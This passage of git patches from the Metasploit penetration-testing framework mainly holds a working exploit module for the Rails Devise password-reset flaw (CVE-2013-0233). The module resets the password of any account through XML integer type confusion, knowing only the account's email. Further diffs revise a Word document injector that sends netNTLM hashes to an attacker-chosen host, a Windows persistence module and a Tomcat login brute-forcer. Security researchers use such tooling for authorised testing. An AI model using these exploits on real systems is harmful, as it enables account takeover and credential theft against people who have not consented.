http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Rails Devise authentication gem Password Reset', + 'Description' => %q{ + The Devise authentication gem for Ruby on Rails is vulnerable + to a password reset exploit leveraging type confusion. By submitting XML + to rails, we can influence the type used for the reset_password_token + parameter. This allows for resetting passwords of arbitrary accounts, + knowing only the associated email address. + + This module defaults to the most common devise URIs and response values, + but these may require adjustment for implementations which customize them. + + Affects Devise < v2.2.3, 2.1.3, 2.0.5 and 1.5.4 when backed by any database + except PostgreSQL or SQLite3. + + Tested w/ v2.2.2, 2.1.2, and 2.0.4. + }, + 'Author' => + [ + 'joernchen', #original discovery and disclosure + 'jjarmoc', #metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', 'CVE-2013-0233'], + [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], + [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], + ], + 'DisclosureDate' => 'Jan 28 2013' + )) + + register_options( + [ + OptString.new('URIPATH', [ true, "The request URI", '/users/password']), + OptString.new('TARGETEMAIL', [true, "The Email address of target account", '']), + OptString.new('PASSWORD', [true, 'The password to set', "#{Rex::Text.rand_text_alpha(rand(10) + 5)}"]), + OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), + OptInt.new('MAXINT', [true, "Max integer to try (Tokens begining with a higher int will fail)", 10]) + ], self.class) + end + + def generate_token(account) + # CSRF token from GET "/users/password/new" isn't actually validated it seems. + + print_status("Generating reset token for #{account}") + + postdata="user[email]=#{account}" + + res = send_request_cgi({ + 'uri' => datastore['URIPATH'], + 'method' => 'POST', + 'data' => postdata, + }) + end + + def clear_tokens() + print_status("Clearing existing tokens") + count = 0 + status = true + until (status == false) do + status = reset_one(Rex::Text.rand_text_alpha(rand(10) + 5)) + count += 1 if status + end + print_status("Cleared #{count} tokens") + end + + def reset_one(password, report=false) + print_status("Resetting password to \"#{datastore['PASSWORD']}\"") if report + + (0..datastore['MAXINT']).each{ |int_to_try| + xml = "" + xml << "<user>" + xml << "<password>#{password}</password>" + xml << "<password_confirmation>#{password}</password_confirmation>" + xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>" + xml << "</user>" + + res = send_request_cgi({ + 'uri' => datastore['URIPATH'] || "/", + 'method' => 'PUT', + 'ctype' => 'application/xml', + 'data' => xml, + }) + + #binding.pry if report + + case res.code + when 200 + # Failure, grab the error text + # May need to tweak this for some apps... + error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] + if (report) && (error_text !~ /token/) + print_error("Server returned an error:") + print_error(error_text) + return false + end + when 302 + #Success! + return true + else + print_error("ERROR: received code #{res.code}") + return false + end + } + + print_error("No active reset tokens below #{datastore['MAXINT']} remain. + Try a higher MAXINT.") if report + return false + + end + + def run + # Clear outstanding reset tokens, helps ensure we hit the intended account. + clear_tokens() if datastore['FLUSHTOKENS'] + + # Generate a token for our account + generate_token(datastore['TARGETEMAIL']) + + # Reset a password. We're racing users creating other reset tokens. + # If we didn't flush, we'll reset the account with the lowest ID that has a token. + status = reset_one(datastore['PASSWORD'], true) + status ? print_good("Success") : print_error("Failed") + end +end \ No newline at end of file From 43a1fbb6f29b783742ac79ff055d6e0783d3797f Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 10 Feb 2013 21:13:18 -0600 Subject: [PATCH 342/421] Make msftiday happy. --- .../auxiliary/admin/http/rails_devise_pass_reset.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index 48ae2186ad10..c249f96d5c71 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -13,12 +13,12 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Rails Devise authentication gem Password Reset', + 'Name' => 'Rails Devise Authentication Gem Password Reset', 'Description' => %q{ The Devise authentication gem for Ruby on Rails is vulnerable - to a password reset exploit leveraging type confusion. By submitting XML + to a password reset exploit leveraging type confusion. By submitting XML to rails, we can influence the type used for the reset_password_token - parameter. This allows for resetting passwords of arbitrary accounts, + parameter. This allows for resetting passwords of arbitrary accounts, knowing only the associated email address. This module defaults to the most common devise URIs and response values, @@ -37,7 +37,7 @@ def initialize(info = {}) 'License' => MSF_LICENSE, 'References' => [ - [ 'CVE', 'CVE-2013-0233'], + [ 'CVE', '2013-0233'], [ 'URL', 'http://blog.plataformatec.com.br/2013/01/security-announcement-devise-v2-2-3-v2-1-3-v2-0-5-and-v1-5-3-released/'], [ 'URL', 'http://www.phenoelit.org/blog/archives/2013/02/05/mysql_madness_and_rails/index.html'], ], @@ -99,7 +99,7 @@ def reset_one(password, report=false) #binding.pry if report - case res.code + case res.code when 200 # Failure, grab the error text # May need to tweak this for some apps... @@ -112,7 +112,7 @@ def reset_one(password, report=false) when 302 #Success! return true - else + else print_error("ERROR: received code #{res.code}") return false end From 991e65770c165f8bde901e335968cbdefc5171a2 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 11 Feb 2013 15:06:19 +0100 Subject: [PATCH 343/421] minor cleanup for word_unc_injector --- modules/auxiliary/docx/word_unc_injector.rb | 52 +++++++++++---------- 1 file changed, 28 insertions(+), 24 deletions(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 3ee9bb93dab3..2d03d0a59624 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -17,30 +17,30 @@ def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft Word UNC Path Injector', 'Description' => %q{ - This module modifies a .docx file that will, upon opening, submit all - stored netNTLM credentials to a remote host. It can also create an empty docx file. - If emailed the receiver needs to put the document in editing mode - before the remote server will be contacted. Preview and read-only - mode do not work. Verified to work with Microsoft Word 2003, - 2007 and 2010 as of January 2013 date by using auxiliary/server/capture/smb + This module modifies a .docx file that will, upon opening, submit stored + netNTLM credentials to a remote host. It can also create an empty docx file. If + emailed the receiver needs to put the document in editing mode before the remote + server will be contacted. Preview and read-only mode do not work. Verified to work + with Microsoft Word 2003, 2007 and 2010 as of January 2013. In order to get the + hashes the auxiliary/server/capture/smb module can be used. }, 'License' => MSF_LICENSE, 'References' => - [ - [ 'URL', 'http://jedicorp.com/?p=534' ], - ], + [ + [ 'URL', 'http://jedicorp.com/?p=534' ] + ], 'Author' => - [ - 'SphaZ <cyberphaz[at]gmail.com>' - ] + [ + 'SphaZ <cyberphaz[at]gmail.com>' + ] )) register_options( [ - OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.','']), - OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document', '']), - OptString.new('FILENAME', [true, 'Document output filename.', 'stealnetNTLM.docx']), - OptString.new('DOCAUTHOR',[false,'Document author for empty document.', '']), + OptAddress.new('LHOST',[true, 'Server IP or hostname that the .docx document points to.']), + OptPath.new('SOURCE', [false, 'Full path and filename of .docx file to use as source. If empty, creates new document.']), + OptString.new('FILENAME', [true, 'Document output filename.', 'msf.docx']), + OptString.new('DOCAUTHOR',[false,'Document author for empty document.']), ], self.class) end @@ -59,24 +59,26 @@ def make_new_file #where to find the skeleton files required for creating an empty document data_dir = File.join(Msf::Config.install_root, "data", "exploits", "docx") - #making the actual docx - docx = Rex::Zip::Archive.new + zip_data = {} + #add skeleton files vprint_status("Adding skeleton files from #{data_dir}") Dir["#{data_dir}/**/**"].each do |file| if not File.directory?(file) - docx.add_file(file.sub(data_dir,''), File.read(file)) + zip_data[file.sub(data_dir,'')] = File.read(file) end end + #add on-the-fly created documents vprint_status("Adding injected files") - docx.add_file("docProps/core.xml", metadata_file_data) - docx.add_file("word/_rels/settings.xml.rels", @rels_file_data) + zip_data["docProps/core.xml"] = metadata_file_data + zip_data["word/_rels/settings.xml.rels"] = @rels_file_data + #add the otherwise skipped "hidden" file file = "#{data_dir}/_rels/.rels" - docx.add_file(file.sub(data_dir,''), File.read(file)) + zip_data[file.sub(data_dir,'')] = File.read(file) #and lets create the file - file_create(docx.pack) + zip_docx(zip_data) end #here we inject an UNC path into an existing file, and store the injected file in FILENAME @@ -177,7 +179,9 @@ def run else #extract the word/settings.xml and edit in the reference we need print_status("Injecting UNC path into existing document.") - if not manipulate_file.nil? + if manipulate_file.nil? + print_error("Failed to create a document from #{datastore['SOURCE']}.") + else print_good("Copy of #{datastore['SOURCE']} called #{datastore['FILENAME']} points to #{datastore['LHOST']}.") end end From 24c3f1b99d6375f535d801cdd151639b07cd5dfd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 11 Feb 2013 15:07:49 +0100 Subject: [PATCH 344/421] fix msftidy --- modules/auxiliary/docx/word_unc_injector.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/docx/word_unc_injector.rb b/modules/auxiliary/docx/word_unc_injector.rb index 2d03d0a59624..926af2a6d39a 100644 --- a/modules/auxiliary/docx/word_unc_injector.rb +++ b/modules/auxiliary/docx/word_unc_injector.rb @@ -84,7 +84,7 @@ def make_new_file #here we inject an UNC path into an existing file, and store the injected file in FILENAME def manipulate_file ref = "<w:attachedTemplate r:id=\"rId1\"/>" - + if not File.stat(datastore['SOURCE']).readable? print_error("Not enough rights to read the file. Aborting.") return nil From 55efe01bf7874782fe0923af16b1fb2a273b271b Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 11:23:06 -0400 Subject: [PATCH 345/421] Applied fixes --- modules/auxiliary/gather/dns_info.rb | 30 +++++++++++++++++++--------- 1 file changed, 21 insertions(+), 9 deletions(-) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index f57fb1649f2a..ce13243377ee 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -40,18 +40,23 @@ def initialize(info = {}) def run print_status("Enumerating #{datastore['DOMAIN']}") @res = Net::DNS::Resolver.new() - @res.retry = datastore['RETRY'].to_i - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + + if datastore['RETRY'] + @res.retry = datastore['RETRY'].to_i + end + + if datastore['RETRY_INTERVAL'] + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + end + wildcard(datastore['DOMAIN']) switchdns() if not datastore['NS'].nil? - # Get A and AAAA Records for the domain get_ip(datastore['DOMAIN']).each do |r| print_good("#{r[:host]} #{r[:address]} #{r[:type]}") report_host(:host => r[:address]) end - # Get Name Servers get_ns(datastore['DOMAIN']).each do |r| print_good("#{r[:host]} #{r[:address]} #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) @@ -63,13 +68,11 @@ def run ) end - # Get SOA get_soa(datastore['DOMAIN']).each do |r| print_good("#{r[:host]} #{r[:address]} #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) end - #Get MX get_mx(datastore['DOMAIN']).each do |r| print_good("#{r[:host]} #{r[:address]} #{r[:type]}") report_host(:host => r[:address], :name => r[:host]) @@ -81,10 +84,12 @@ def run ) end - # Get TX get_txt(datastore['DOMAIN']).each do |r| - print_good("#{r[:host]} #{r[:address]} #{r[:type]}") - report_host(:host => r[:address], :name => r[:host]) + report_note(:host => datastore['DOMAIN'], + :proto => 'UDP', + :port => 53, + :type => 'dns.info', + :data => {:text => r[:text]}) end end @@ -175,12 +180,19 @@ def get_soa(target) #--------------------------------------------------------------------------------- def get_txt(target) + results = [] query = @res.query(target, "TXT") if (query) query.answer.each do |rr| + record = {} print_good("Text: #{rr.txt}, TXT") + record[:host] = target + record[:text] = rr.txt + record[:type] = "TXT" + results << record end end + return results end #--------------------------------------------------------------------------------- From 5f107046973def335d690497c048ca4622ce2649 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 11:31:13 -0400 Subject: [PATCH 346/421] applied fixes --- modules/auxiliary/gather/dns_reverse_lookup.rb | 14 ++++++++++---- 1 file changed, 10 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/gather/dns_reverse_lookup.rb b/modules/auxiliary/gather/dns_reverse_lookup.rb index e3e28342a678..cc102b92350a 100644 --- a/modules/auxiliary/gather/dns_reverse_lookup.rb +++ b/modules/auxiliary/gather/dns_reverse_lookup.rb @@ -33,14 +33,21 @@ def initialize(info = {}) [ OptInt.new('RETRY', [ false, "Number of times to try to resolve a record if no response is received", 2]), OptInt.new('RETRY_INTERVAL', [ false, "Number of seconds to wait before doing a retry", 2]), - OptInt.new('THREADS', [ false, "Number of seconds to wait before doing a retry", 2]), + OptInt.new('THREADS', [ true, "Number of seconds to wait before doing a retry", 2]), ], self.class) end def run @res = Net::DNS::Resolver.new() - @res.retry = datastore['RETRY'].to_i - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + + if datastore['RETRY'] + @res.retry = datastore['RETRY'].to_i + end + + if datastore['RETRY_INTERVAL'] + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + end + @threadnum = datastore['THREADS'].to_i switchdns() if not datastore['NS'].nil? reverselkp(datastore['RANGE']) @@ -72,7 +79,6 @@ def reverselkp(iprange) rescue ::Rex::ConnectionError rescue ::Exception => e print_error("Error: #{tip}: #{e.message}") - elog("Error running against host #{tip}: #{e.message}\n#{e.backtrace.join("\n")}") end end end From fd6f00f641e3a2e3d3b9cac459fe592ea394882f Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 11:37:20 -0400 Subject: [PATCH 347/421] added report note for wildcard --- modules/auxiliary/gather/dns_info.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/modules/auxiliary/gather/dns_info.rb b/modules/auxiliary/gather/dns_info.rb index ce13243377ee..a6f0ff2b80bd 100644 --- a/modules/auxiliary/gather/dns_info.rb +++ b/modules/auxiliary/gather/dns_info.rb @@ -101,6 +101,11 @@ def wildcard(target) print_status("This Domain has Wildcards Enabled!!") query.answer.each do |rr| print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + report_note(:host => datastore['DOMAIN'], + :proto => 'UDP', + :port => 53, + :type => 'dns.wildcard', + :data => "Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") end return true else From 5edb138a8f370f033723e6202d3912c104ad921e Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 11:51:33 -0400 Subject: [PATCH 348/421] fixed nil issue --- modules/exploits/windows/local/persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb index 386d6900de4f..126b94e3f596 100644 --- a/modules/exploits/windows/local/persistence.rb +++ b/modules/exploits/windows/local/persistence.rb @@ -163,7 +163,7 @@ def log_file(log_path = nil) #------------------------------------------------------------------------------- def write_script_to_target(vbs,name) tempdir = session.fs.file.expand_path("%TEMP%") - if name + if name == nil tempvbs = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".vbs" else tempvbs = tempdir + "\\" + name + ".vbs" From 431641fec9cfcdede80fa543d7d921cff81a5f52 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 12:02:15 -0400 Subject: [PATCH 349/421] added check for retry options --- modules/auxiliary/gather/dns_srv.rb | 9 +++++++-- 1 file changed, 7 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/gather/dns_srv.rb b/modules/auxiliary/gather/dns_srv.rb index 4bbccba51835..71f95c161dc9 100644 --- a/modules/auxiliary/gather/dns_srv.rb +++ b/modules/auxiliary/gather/dns_srv.rb @@ -38,8 +38,13 @@ def initialize(info = {}) def run records = [] @res = Net::DNS::Resolver.new() - @res.retry = datastore['RETRY'].to_i - @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + if datastore['RETRY'] + @res.retry = datastore['RETRY'].to_i + end + + if datastore['RETRY_INTERVAL'] + @res.retry_interval = datastore['RETRY_INTERVAL'].to_i + end print_status("Enumerating SRV Records for #{datastore['DOMAIN']}") records = records + srvqry(datastore['DOMAIN']) From 6c85e5242e6285f3a76b14c24fa85a59b6288fd2 Mon Sep 17 00:00:00 2001 From: Carlos Perez <carlos_perez@darkoperator.com> Date: Mon, 11 Feb 2013 12:04:30 -0400 Subject: [PATCH 350/421] change wildcard message to print_warning --- modules/auxiliary/gather/dns_bruteforce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/dns_bruteforce.rb b/modules/auxiliary/gather/dns_bruteforce.rb index 0c289eddb3a9..070c32f0cca3 100644 --- a/modules/auxiliary/gather/dns_bruteforce.rb +++ b/modules/auxiliary/gather/dns_bruteforce.rb @@ -57,7 +57,7 @@ def wildcard(target) if query.answer.length != 0 print_status("This Domain has Wildcards Enabled!!") query.answer.each do |rr| - print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME + print_warning("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME end return true else From 84534caae167697a6930776a0fdf9c0d5243f40a Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 11 Feb 2013 10:32:44 -0600 Subject: [PATCH 351/421] Fix expliciti basic_auth for http --- lib/rex/proto/http/client.rb | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 760268a7f78e..41adf30aedce 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -239,6 +239,7 @@ def request_raw(opts={}) # @return [Request] def request_cgi(opts={}) c_ag = opts['agent'] || config['agent'] + c_auth = opts['basic_auth'] || config['basic_auth'] || '' c_body = opts['data'] || '' c_cgi = opts['uri'] || '/' c_conn = opts['connection'] @@ -313,6 +314,10 @@ def request_cgi(opts={}) req << set_host_header(c_host) req << set_agent_header(c_ag) + if (c_auth.length > 0) + req << set_basic_auth_header(c_auth) + end + req << set_cookie_header(c_cook) req << set_connection_header(c_conn) req << set_extra_headers(c_head) From e72dc47448a7747e347d3a3715ac7657d96592b4 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 11:12:29 -0600 Subject: [PATCH 352/421] Uses REXML for encoding of password. --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index c249f96d5c71..b902b6d7a97a 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -6,6 +6,7 @@ ## require 'msf/core' +require 'rexml/element' class Metasploit3 < Msf::Auxiliary @@ -80,13 +81,15 @@ def clear_tokens() end def reset_one(password, report=false) - print_status("Resetting password to \"#{datastore['PASSWORD']}\"") if report + print_status("Resetting password to \"#{password}\"") if report (0..datastore['MAXINT']).each{ |int_to_try| + encode_pass = REXML::Text.new(password).to_s + xml = "" xml << "<user>" - xml << "<password>#{password}</password>" - xml << "<password_confirmation>#{password}</password_confirmation>" + xml << "<password>#{xmlpass}</password>" + xml << "<password_confirmation>#{encode_pass}</password_confirmation>" xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>" xml << "</user>" From 61ffcedbfd64fd6d190a6d92f4f0265e757463de Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 11:17:26 -0600 Subject: [PATCH 353/421] Address HD's other comments, fixes mismatched var name in last commit. --- .../auxiliary/admin/http/rails_devise_pass_reset.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index b902b6d7a97a..ac2a3d894203 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -14,7 +14,7 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'Rails Devise Authentication Gem Password Reset', + 'Name' => 'Ruby on Rails Devise Authentication Password Reset', 'Description' => %q{ The Devise authentication gem for Ruby on Rails is vulnerable to a password reset exploit leveraging type confusion. By submitting XML @@ -48,10 +48,10 @@ def initialize(info = {}) register_options( [ OptString.new('URIPATH', [ true, "The request URI", '/users/password']), - OptString.new('TARGETEMAIL', [true, "The Email address of target account", '']), - OptString.new('PASSWORD', [true, 'The password to set', "#{Rex::Text.rand_text_alpha(rand(10) + 5)}"]), + OptString.new('TARGETEMAIL', [true, "The email address of target account"]), + OptString.new('PASSWORD', [true, 'The password to set']), OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), - OptInt.new('MAXINT', [true, "Max integer to try (Tokens begining with a higher int will fail)", 10]) + OptInt.new('MAXINT', [true, "Max integer to try (tokens begining with a higher int will fail)", 10]) ], self.class) end @@ -88,7 +88,7 @@ def reset_one(password, report=false) xml = "" xml << "<user>" - xml << "<password>#{xmlpass}</password>" + xml << "<password>#{encode_pass}</password>" xml << "<password_confirmation>#{encode_pass}</password_confirmation>" xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>" xml << "</user>" From a43b902b5cb163df1b9040e6eda31f031b0e9d75 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 11 Feb 2013 12:00:40 -0600 Subject: [PATCH 354/421] Fix tomcat_mgr_login auth --- modules/auxiliary/scanner/http/tomcat_mgr_login.rb | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 65ab691e66dd..75f88e7ed3db 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -87,10 +87,6 @@ def run_host(ip) vprint_error("http://#{rhost}:#{rport}#{uri} - No response") return end - if res.code != 401 - vprint_error("http://#{rhost}:#{rport} - Authorization not requested") - return - end each_user_pass { |user, pass| do_login(user, pass) @@ -107,10 +103,8 @@ def do_login(user='tomcat', pass='tomcat') res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } + 'username' => user, + 'password' => pass }, 25) unless (res.kind_of? Rex::Proto::Http::Response) vprint_error("http://#{rhost}:#{rport}#{uri} not responding") From 0ccf7dd58a0ebe908f745045f1b6ac3837781799 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 11 Feb 2013 13:06:26 -0600 Subject: [PATCH 355/421] trust any manualy set basic auth header for now we will assume the module author knows what they are doing. --- lib/rex/proto/http/client.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 41adf30aedce..3f85ddd9f888 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -209,7 +209,9 @@ def request_raw(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - req << set_basic_auth_header(c_auth) + unless c_head['Authorization'].include? "Basic" + req << set_basic_auth_header(c_auth) + end end req << set_cookie_header(c_cook) @@ -315,7 +317,9 @@ def request_cgi(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - req << set_basic_auth_header(c_auth) + unless c_head['Authorization'].include? "Basic" + req << set_basic_auth_header(c_auth) + end end req << set_cookie_header(c_cook) From f90fdcd5eba83df46b8f677498459df47bf3c077 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Mon, 11 Feb 2013 13:14:05 -0600 Subject: [PATCH 356/421] Missed nil check --- lib/rex/proto/http/client.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 3f85ddd9f888..75ba1f957492 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -209,7 +209,7 @@ def request_raw(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - unless c_head['Authorization'].include? "Basic" + unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" req << set_basic_auth_header(c_auth) end end @@ -317,7 +317,7 @@ def request_cgi(opts={}) req << set_agent_header(c_ag) if (c_auth.length > 0) - unless c_head['Authorization'].include? "Basic" + unless c_head['Authorization'] and c_head['Authorization'].include? "Basic" req << set_basic_auth_header(c_auth) end end From 753fa2c85324b3881c5475809b15129c7f5ee64f Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 13:58:56 -0600 Subject: [PATCH 357/421] Handles error when TARGETEMAIL is invalid. --- .../admin/http/rails_devise_pass_reset.rb | 19 ++++++++++++++++--- 1 file changed, 16 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index ac2a3d894203..e6898a57973d 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -7,6 +7,7 @@ require 'msf/core' require 'rexml/element' +require 'pry' class Metasploit3 < Msf::Auxiliary @@ -67,6 +68,15 @@ def generate_token(account) 'method' => 'POST', 'data' => postdata, }) + + if res.code == 200 + error_text = res.body[/<div id=\"error_explanation\">\n\s+(.*?)<\/div>/m, 1] + print_error("Server returned an error:") + print_error(error_text) + return false + end + return true + #binding.pry end def clear_tokens() @@ -100,8 +110,6 @@ def reset_one(password, report=false) 'data' => xml, }) - #binding.pry if report - case res.code when 200 # Failure, grab the error text @@ -132,7 +140,12 @@ def run clear_tokens() if datastore['FLUSHTOKENS'] # Generate a token for our account - generate_token(datastore['TARGETEMAIL']) + status = generate_token(datastore['TARGETEMAIL']) + if status == false + print_error("Failed") + return + end + print_good("Success") # Reset a password. We're racing users creating other reset tokens. # If we didn't flush, we'll reset the account with the lowest ID that has a token. From 5f0a3c6b9e3dca51cb68aa39f413a7affcab2ebd Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 14:02:46 -0600 Subject: [PATCH 358/421] Removes pry, oops. --- modules/auxiliary/admin/http/rails_devise_pass_reset.rb | 2 -- 1 file changed, 2 deletions(-) diff --git a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb index e6898a57973d..6445c286be72 100644 --- a/modules/auxiliary/admin/http/rails_devise_pass_reset.rb +++ b/modules/auxiliary/admin/http/rails_devise_pass_reset.rb @@ -7,7 +7,6 @@ require 'msf/core' require 'rexml/element' -require 'pry' class Metasploit3 < Msf::Auxiliary @@ -76,7 +75,6 @@ def generate_token(account) return false end return true - #binding.pry end def clear_tokens() From 766257d26ac6ca2c08dabf42af7fec06998480bb Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 11 Feb 2013 21:21:43 +0100 Subject: [PATCH 359/421] pointed by @m-1-k-3 while working on #1472 --- modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb index 2c99d9c9f41c..189f937ea1ab 100644 --- a/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb +++ b/modules/auxiliary/admin/http/linksys_wrt54gl_exec.rb @@ -136,7 +136,7 @@ def run res = send_request_cgi({ 'uri' => uri, 'method' => 'POST', - 'basic_auth' => "#{pass}:#{pass}", + 'basic_auth' => "#{user}:#{pass}", #'data' => data_cmd, 'vars_post' => { From ddd7d307e6e5f917744e0b2c8da59eb79667b103 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Mon, 11 Feb 2013 16:48:44 -0600 Subject: [PATCH 360/421] Add a scanner aux module for Rails JSON/YAML vuln CVE-2013-0333 --- .../scanner/http/rails_json_yaml_scanner.rb | 101 ++++++++++++++++++ 1 file changed, 101 insertions(+) create mode 100644 modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb diff --git a/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb new file mode 100644 index 000000000000..64c67cf86b25 --- /dev/null +++ b/modules/auxiliary/scanner/http/rails_json_yaml_scanner.rb @@ -0,0 +1,101 @@ +## +# This file is part of the Metasploit Framework and may be subject to 